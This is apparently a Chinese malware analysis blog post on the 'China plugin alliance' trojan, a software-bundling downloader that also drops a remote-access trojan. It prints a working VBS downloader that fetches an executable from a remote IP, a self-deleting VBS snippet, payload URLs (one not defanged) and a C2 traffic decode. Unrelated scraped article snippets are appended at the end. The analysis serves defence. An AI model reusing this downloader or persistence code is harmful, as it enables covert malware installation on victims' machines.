中国插件联盟

 

摘要

  一款名叫”中国插件联盟”的木马最近又开始活跃了。该木马早期通过搜狐影音的下载模块程序启动该木马,最近发现的是通过系统的svchost.exe启动该木马。使人防不胜防,一不小心就中招了。

 

木马危害

该木马简单的看上去就是一个软件推广程序。可是其实不是那么简单,该木马程序不仅在用户电脑上安装很多很多的软件,还在用户电脑上释放一个远控木马。一旦中了远控木马,远控端的想给你电脑上装啥就给你装啥,平时有事没事瞅瞅你在干嘛,有事没事翻翻你的文件,有事没事帮你装一些软件等等等等,哎呀妈呀,想想都觉得好可怕。

让中招后的图直击你的双眼吧看看看看这都是啥(ps:开机后还会看大更多,这里就不一一截图~\(≧▽≦)/~啦啦啦)

 

 

 

木马流程

木马的流程简要概括一下就是通过vbs脚本,下载一个下载者、一个远控木马和大量安装包到本地。然后新下载的下载者继续下载安装包。远控木马通过一系列隐藏手法将自己放在用户不用一察觉的文件夹,同时操作注册表写入服务,使远控木马开机自启动。

 

木马行为分析

0x01  用vbs脚本

该脚本的就是将远程服务器上的svchost.exe程序重命名为putty.exe(一个下载者)文件

1: Set xPost=createObject("Microsoft.XMLHTTP") 
   2: xPost.Open "GET","http://183.xxx.80.93:3389/svchost.exe",0 
   3: xPost.Send() 
   4: set sGet=createObject("ADODB.Stream") 
   5: sGet.Mode=3 
   6: sGet.Type=1 
   7: sGet.Open() 
   8: sGet.Write xPost.ResponseBody 
   9: sGet.SaveToFile "C:\Windows\Temp\putty.exe",2
  10: Set xPost=createObject("Microsoft.XMLHTTP") 
  11: xPost.Open "GET","http://183.xxx.80.93:3377/svchost.exe",0 
  12: xPost.Send() 
  13: set sGet=createObject("ADODB.Stream") 
  14: sGet.Mode=3 
  15: sGet.Type=1 
  16: sGet.Open() 
  17: sGet.Write xPost.ResponseBody 
  18: sGet.SaveToFile "C:\Windows\Temp\putty.exe",2

 

0x02 putty.exe程序分析

1.读取远程服务器上的txt文档,进行批量下载批量下载

通过读取hxxp://txt.ichajianlianmeng.com:88/1001.txt页面的内容,然后进行下载

调用用InternetConnectA建立远程访问

 

通过httpOpenRequestA和HttpSendRequestA创建请求并发送请求到HTTP服务器

读取到远程服务器中的txt保存的内容

hxxp://down.ichajianlianmeng.com:888/sie.exe
hxxp://www.yczuowenwang.com/xp.exe
hxxp://cdn.yuu361.com/download/Fresh_20i5_052039fc.exe
hxxp://down.woka123.cn/qudao/lol/dmxyxhh_504.exe
hxxp://down.biomall.org.cn/meng/up/niutu410202.exe
hxxp://down.nvjay.com:6677/huajun/huajun_15-8.exe
hxxp://down.ichajianlianmeng.com:888/59801_6789_sd1.exe
hxxp://down.sushouspell.com/sushou/sw/-2208_1_ss.exe
hxxp://download.suxiazai.com/for_down/2013/install1552262.exe

通过InternetReadFile依次读取上面链接的内容到程序中

创建文件、写入数据、执行该程序

后面就循环读读取完链接中的内容并创建进程,第一轮下载就完毕了

中间会创建一个空的MD5文件,该文件只是用来做标记,如果再次运行这个下载者就不在进行下载了

 

0x03 sie.exe---下载者里的下载者

   嗷嗷啊,世界真是奇妙,一层一层有一层,因为此下载者的功能和实现跟上面的是一样,所以这里就不再次写分析过程了,只是这次的下载者不会再释放出下载者了。

第二轮下载通过访问hxxp://txt.ichajianlianmeng.com:88/siedown.txt文件中的以下链接进行下载

   1: http://down.meituview.com/MTViewbuildmtview_116.exe
   2: #
   3: hxxp://down.shkbx.com/SC_rg0cfc_xt2005_1.exe
   4: #
   5: hxxp://down.shkbx.com/SC_rg0cfc_xt2000_1.exe
   6: #
   7: hxxp://down.sou2v.com/UserFiles/install_107_1a.exe
   8: #
   9: hxxp://down.sushouspell.com/sushou/sw/-2208_1_ss.exe

然后得到下面的文件

 

0x04 xx360.exe远控木马

通过乱序字符串拼接的方式获取到即将创建文件的路径

创建文件、访问hxxp://61.160.195.24:666/NetSyst81.dll并读取数据到内存中

 

将刚刚读取到的数据写入NetSys.dll文件中

读取NetSys.dll中的内容,并在内存在申请空间,解密刚刚获取到的NetSys.dll文件,解密后获得一个PE结构的文件(其实就会我们这个木马的本身的一个复制品,利用这样的放法来迷惑杀毒软件)

 

创建并执行Terms.EXE.exe文件

 

创建注册表和服务,达到隐藏和长期驻扎在用户电脑里而且开机自启动

对远控抓包分析(原来的远控木马已经不能连接上了,这里把自己的主机配置成该目标程序)

 

嗷嗷,这就是把自己的主机配置成目标后接受到的数据,一看就是zlib格式的,前面就是一个头,截取后面的拿去python脚本里跑一跑

 

用Python解密后,看到自己电脑的操作系统版本,以及用户名,还有上线时间了

   1: a = ‘b313640002154620310788598118c4d6e062606002d2c1a9456599c9a90a0189c9d90ac60c7407cc208211e8220510e3c00ac60686ff20b137f68c50150220820b44241695649416eb1a1a269ba6985b1a32182d3c68ac676ce4ee51c56070e68dc1a98d26e6dbaf31d88459e8991bda2904c71b1a19181b98321819189aea1a98e91a1a29181a5a9918321c5973e2fcf66bd75f329cdbb27dd1f96b0a0c0029dd29b0‘
   2: import codecs
   3: b = codecs.decode(a, ‘hex_codec‘)
   4: zlib.decompress(b, -8)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

释放vbs文件,删除自身,使自己隐藏起来

   1: dim wsh
   2: On Error Resume Next
   3: set wsh=createObject("WScript.Shell")
   4: Set objFSO = CreateObject("Scripting.FileSystemObject")
   5: wscript.sleep 1000
   6: objFSO.DeleteFile("C:\Documents and Settings\Administrator\桌面\360.exe"), True
   7: createobject("scripting.filesystemobject").deletefile wscript.scriptfullname      

数据统计

0x01获取到的文件数量

已捕获到文件的MD值,软件包是大量的(该远程服务器上的数据包是在不断地更新的,所以获取到的安装包的量很大,下面只是一部分)

   1: e3198f710f307e16413cd7d599f971ebc
   2: e3198f710f307e16413cd7d599f971eb
   3: 1552ccfa8cef81056d5c23d167cafd19c
   4: 1552ccfa8cef81056d5c23d167cafd19
   5: bba33d5501a780c392e4da520506da25
   6: 6b08cdde7530efab0a9a5275ff4867b3
   7: abba9c49e181f27b4f387ab88c505646
   8: a22e31255f3092f4d1b429d76976ba0f
   9: 8268182d660f2d72c05ff3c2bec90f61
  10: 8910b238873a26f76854c102eab68673
  11: 2a011d1c0ad02a9acf5315ccb7657713
  12: e41c325df557e54ab95ff5dc81abfd8c
  13: 20d6852156af4db9cac546e666a436ff
  14: a22e31255f3092f4d1b429d76976ba0f
  15: e0126226ff5a65b283db12d02ccc5a1d
  16: 27c38edd7fd7c8c2eeddac457a407c0f
  17: 8fa79dd7f1ba8b047862a904c69d40da
  18: e94591e1dd94d0ea6fe2f03d9cdde05c
  19: 6d0678e31452aafd6aee2c4947b4ef48
  20: 6a5ab49d61623e22618e8b9c4904e85f
  21: 45529e071f7f5d5b05705a9e35c5ddab
  22: 5312719ecc909d4c47452eacc8452c73
  23: 5312719ecc909d4c47452eacc8452c73

 

0x02木马传播量

sie.exe(5312719ecc909d4c47452eacc8452c73)下载者   从2015-05-30到现在的查询量:6229088

xx360.exe(e94591e1dd94d0ea6fe2f03d9cdde05) 远控木马  从2015-06-06到现在的查询量:11792

Server.exe(6a5ab49d61623e22618e8b9c4904e85f)  远控木马   从2015-04-25到现在的查询量:324722

 

总结

通过分析我们可以看出,该木马不仅是一个流氓推广软件,而且是一个远控木马。给用户强制安装大量软件的同时侵犯了用户的隐私。如果用户在使用电脑的过程中,莫名其妙的出现大量的软件,就请及时用360扫描进行全盘杀毒

该文件被下载下来的时候就能被360安全卫士检测到

时间: 2024-11-05 17:26:52

中国插件联盟的相关文章

30秒让让你的电脑快一倍 - 计算机基础 - 中国红客联盟 - Powered

一.清理垃圾 在Windows在安装和使用过程中都会产生相当多的垃圾文件,包括临时文件(如:*.tmp.*._mp)日志文件(*.log).临时帮助文件(*.gid).磁盘检查文件(*.chk).临时备份文件(如:*.old.*.bak)以及其他临时文件.特别是如果一段时间不清理IE的临时文件夹“Temporary Internet Files”,其中的缓存文件有时会占用上百MB的磁盘空间.这些LJ文件不仅仅浪费了宝贵的磁盘空间,严重时还会使系统运行慢如蜗牛.这点相信你肯定忍受不了吧!所以应及时

VMware投资10亿于中国并启动Linux开发项目

如果说刚开始成立云公司是一种小规模的实验性的动作,实际上到今天为止中国电信内部将云视为未来一个战略支柱型的产业. 在主题为“纵横无限”的vForum 2014大会上,VMware公布对中国市场的投资计划及最新的与合作伙伴的合作. 同时,就VMware与中国电信天翼推混合云服务,VMware公司全球副总裁.大中华区总裁宋家瑜说:“我们三大战略软件定义数据中心.混和云和企业移 动.而在整个混合云战略里,最重要的合作伙伴就是中国电信:混合云服务就是彻底解决行业客户对快速业务快速平滑牵移及简捷的需求.与

第二届中国首席技术官大会CCTOC2017将于9月22日在杭州召开

二十世纪90年代,因计算机和软件行业的高速发展,很多IT公司把首席技术官(Chief Technology Officer, CTO)的名称给予管理计算机系统和软件研发的负责人.在不同行业领域的公司,CTO工作性质有所不同,即使在同一行业领域,工作性质也可能大不相同.CTO一般会承担责任包括长期技术方向(战略性).短期技术方向(战术性).产品技术架构.信息系统总体设计等.在当前"互联网+"和"大众创业.万众创新"国家战略深度融合的时代背景下,CTO更是成为了初创公司

中国十大软件测试网站及相关测试人员博客

有经验的测试博客 http://blog.chinaunix.net/uid-12014716-id-5072601.html 中国十大软件测试网站 转自https://www.testwo.com/blog/7922 No.1: 软件测试网 www.51testing.com  国内最大的综合性软件测试网,许多经验分享和资源都可在里面找到,新手.菜鸟必备网站.人气指数毫无疑问列为第1,但近年来可能因为上市原因,每况日下. No.2:领测国际 www.ltesting.net 比较综合的软件测试

超级联盟的关系商店能否挽救国产操作系统的败局?

超级联盟的脸谱如下: 资料显示,中国智能终端操作系统产业联盟(本文简称"超级联盟"),由中国电子信息产业集团.中国电子科技集团.中国软件行业协会.中国可信计算联盟.中国TD产业联盟.中国移动通信联合会.国家计算机网络应急技术处理协调中心.互联网实验室和中国有关"政.产.学.研.用"各界发起组建,牵头人是倪光南院士. 据了解,目前国内从事操作系统开发的厂商多达15家,绝大多数厂商都推出了正式发行版本的操作系统,但因为缺乏通用的应用软件,这些系统的应用范围都只局限在某个

被FBI点名的中国黑客-Lion

网名:Lion(狮子) 真实姓名:林勇 QQ:21509     简介:红客联盟创始人(该组织在2001年5月的黑客大战中一举成名,会员人数最多时达到6万,很有影响力),现在安氏因特网安全系统(中国)有限公司高级技术专员.特长:3年以上WindowsNT系统管理员经验,2年以上Unix系统管理员经验,对Solaris.Linux.WindowsNT/2000系统安全有较深入了解:熟悉各种安全产品的使用,熟悉各种网络安全技术和黑客攻防技术,有丰富黑客攻防实战经验,有丰富的项目管理和安全顾问工作经验

VMware的中国风情

5年10亿美元,VMware要在中国大干一场了.VMware的超融合解决方案.桌面虚拟化.混合云服务都已经在中国安了家,而新成立的VMware亚洲研究院则要成为连接世界与中国客户的桥梁. VMware公司未来5年内将向中国市场投资10亿美元.当VMware公司首席执行官帕特·基辛格(Pat Gelsinger)在一年一度的VMware vForum中国大会上宣布这一消息时,全场的气氛达到了一个高潮. 每年都会在美国VMworld大会之后举办的VMware vForum中国大会,就像是VMworl

中国黑客

中国黑客十大牛人 NO.10 网名:冰雪封情 所属组织:邪恶八进制 介绍:中国现役风云组织邪恶八进制站长,中国黑客界后起领袖人物. 入选理由:现在如日中天的邪恶八进制在冰雪封情的正带领走向另一个新的高峰,在进入黑客界并不很久的情况下冰血封情以极快的速度发展自己和所在组织,并影响着其他黑客向着更高顶峰攀登,期待着他能更多的为黑客文化作出更多贡献. NO.9 网名:中华特攻  (King  Xer) 所属组织:中国网络安全部队.雷霆反计算机病毒小组 介绍:中国网络安全部队站长,雷霆反计算机病毒小组站

中国黑客榜

No.0.红衣教主及水军 我大教主天赋异禀,江湖一代奇才,长于左右手互搏及过河拆桥之术,想知道被他拆过的桥有多少怕是和他的众多水军般数也数不清.近年教主获大辽国不明真相群众投资,在我大宋兴起一场血雨腥风.惨不忍睹的江湖大战,让各路江湖大老纷纷上阵,有如IC兄直接赤膊上阵,当然据江湖传闻IC兄经此役后,忠心表了风投也拿了,搞得我大穷吊YY哪天有幸能在大马路上遇到教主一板砖拍死Y的. 精于蛊惑之术乃我大教主另一无人能及之处,欲练此术非凡人而不得,这个榜中有如我大袁哥之神人也受教主蛊惑,人数太多不一一